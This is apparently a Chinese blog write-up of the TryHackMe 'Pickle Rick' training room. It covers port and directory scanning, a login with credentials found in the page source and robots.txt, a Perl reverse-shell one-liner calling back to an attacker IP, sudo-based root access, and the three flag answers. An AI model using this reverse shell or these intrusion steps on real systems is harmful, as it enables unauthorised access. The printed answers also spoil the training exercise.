THM-Pickle Rick-练习

THM-Pickle Rick-练习

Hekeatsll
  2024-01-27 14:03:55 2024-01-27 14:03:55 Created   2024-01-27 14:03:22 2024-01-27 14:03:22 Updated      1.1k Words  4 Mins  

本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/picklerick

任务目标

找到3个成分,将帮助瑞克制作他的药水,把自己从一个泡菜变回人类。

目标地址https:/MACHINE-IP.p.thmlabs.com 此处为:https://10-10-253-251.p.thmlabs.com/

实践操作

1
2
端口扫描
nmap -T4 -sC -sV -p- 10.10.253.251

image-20220927120845431

目标开放了两个端口:22/tcp ssh服务 80/tcp http服务

访问目标网站的http服务,查看网站源代码,获取到关于用户名的提示:

image-20220927121045775

用户名为:R1ckRul3s

1
2
目录和文件扫描
gobuster dir -u http://10.10.253.251 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py

image-20220927122325445

扫描到

/index.html

/login.php

/assets

/portal.php

/robots.txt

去目标站点访问以上页面和文件:

1
2
3
4
5
index.html是首页,和之前访问网站时的默认页面一样,
login.php是登陆页面(这个要关注一下),
assets目录下有一些网站资源文件(看了一下没啥特别的),
portal.php访问时会自动跳转到之前的login.php页面,估计要登陆后才能看到,
robot.txt文件有一串字符为Wubbalubbadubdub,可能是登陆密码。

image-20220927123458547

image-20220927123534743

image-20220927123419683

在登陆页面尝试使用之前得到的用户名以及在robots文件中得到的字符进行登陆,发现能够登陆成功,并给出一个命令执行面板:

image-20220927124227553

利用命令面板,输入命令查找文件信息,找到第一个flag(无法通过cat命令查看,但可通过url路径进行访问):

image-20220927124643763

image-20220927124733364

第一个flag是:mr. meeseek hair

继续探索命令面板,第一次使用ls命令还看到了一些其他文件,现在尝试访问一下,denied.php是一个被禁止访问的页面,clue.txt提示我们在文件系统中查找其他成分:

image-20220927125210820

利用网站所提供的命令面板建立反向shell(这里试了很多语言的反向shell,发现Perl语言的shell可行),首先在攻击机终端建立监听器,查看该服务器是否支持Perl(命令:which Perl),再执行Perl的反向shell命令:

image-20220927131746063

反向shell命令内容参考(修改ip、端口和攻击机匹配):https://github.com/security-cheatsheet/reverse-shell-cheatsheet 

1
2
perl -e 'use Socket;$i="10.14.30.69";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

image-20220927133646735

成功建立反向shell,查找flag即可,第一个flag我们已经知道 我们找其他的(当前目录没有目标flag时,尝试找/home /root等关键目录):

image-20220927133924593

image-20220927134805181

第二个flag是:1 jerry tear

上图中的 cat ‘second ingredients’ 之所以加单引号是因为该名称中间存在空格

如果不加引号 则只能识别到second而不是second ingredients

也可以尝试用其他方式处理:second\ ingredients或者”second ingredients”

尝试cd /root,发现无法移动到/root目录下,

输入sudo -l 列出目前用户可执行与无法执行的指令,发现我们可以通过sudo免密码使用root用户:

image-20220927135922502

image-20220927135847160

第三个flag是:fleeb juice

关于第二个flag和第三个flag的其他解法

利用登陆之后网页所提供的命令面板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
输入ls会显示当前网站根目录下的目录及文件
输入sudo -l列出目前用户可执行与无法执行的指令,发现我们可以通过sudo免密码使用root用户

此时,可以使用sudo ls命令找到/home目录以及/root下的flag文件,
对于/home目录,也可以通过组合命令(cd /home;ls;pwd、cd /home/rick/;ls;pwd)去找flag文件   

如果想通过网站url访问flag文件内容,可以使用sudo cp命令复制flag文件到网站根目录,涉及的命令如下:
sudo ls /home
sudo ls /home/rick/
sudo cp /home/rick/second\ ingredients ./second.txt   
sudo ls /root
sudo cp /root/3rd.txt . 

如果想直接在网页的命令面板界面查看flag内容,可以使用以下命令(当然前提还是要先找到flag文件的位置):
less /home/rick/second\ ingredients
sudo less /root/3rd.txt

image-20220927143427676

image-20220927143605462

image-20220927151113944

image-20220927151156861

关于less命令:less命令 的作用与more十分相似,都可以用来浏览文字档案的内容,不同的是less命令允许用户向前或向后浏览文件,而more命令只能向前浏览。

完整答案

image-20220927140953884

  • Title: THM-Pickle Rick-练习
  • Author: Hekeatsll
  • Created at : 2024-01-27 14:03:55
  • Updated at : 2024-01-27 14:03:22
  • Link: https://hekeatsll.github.io/2024/01/27/THM-Pickle Rick-练习/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
THM-Pickle Rick-练习
  1. 任务目标
  2. 实践操作
  3. 完整答案